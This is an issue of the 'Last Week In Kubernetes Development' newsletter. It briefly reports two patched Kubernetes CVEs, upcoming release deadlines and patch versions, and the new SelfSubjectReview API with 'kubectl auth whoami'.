Two security reports this week: CVE-2022-3172, which allows aggregated API servers to misdirect traffic and steal credentials, and CVE-2021-25749, which can let users deploy Windows container workloads as Administrator. Both issues are fixed in the latest patch releases. Note that the patch for CVE-2022-3172 blocks all 300ish responses, so test after upgrading and be prepared to set
--aggregator-reject-forwarding-redirect if your API server uses redirects.
The Contributor Summit CfP is still open.
Next Deadline: Production Readiness Review, September 29th
Have your draft KEPs ready for the PRR team by next Thursday, and final versions opted-in by October 6th. Current CI signal is green.
Patch releases for 1.25.1, 1.24.5, 1.23.11, and 1.22.14 came out last week. In addition to the above security issues, these patches fix a large number of bugs discovered during 1.25 Code Freeze and backported, as well as updating Go for all versions.
For a long time, the
TokenReview API under
authentication/v1 has allowed getting the user details from a cluster JWT, such as a ServiceAccount token. This allowed checking the source of credentials from another party but not for yourself. The newly added
SelfSubjectReview provides this capability. This allows any user to confirm what user information kube-apiserver sees for them, both for debugging user configurations with the new
kubectl auth whoami or server-side plugin configuration issues. Check it out if you have any automated troubleshooting tools or self-diagnostic systems.
Last Week In Kubernetes Development (LWKD) is a product of multiple contributors participating in Kubernetes SIG Contributor Experience. All original content is licensed Creative Commons Share-Alike, although linked content and images may be differently licensed. LWKD does collect some information on readers, see our privacy notice for details.
You may contribute to LWKD by submitting pull requests or issues on the LWKD github repo.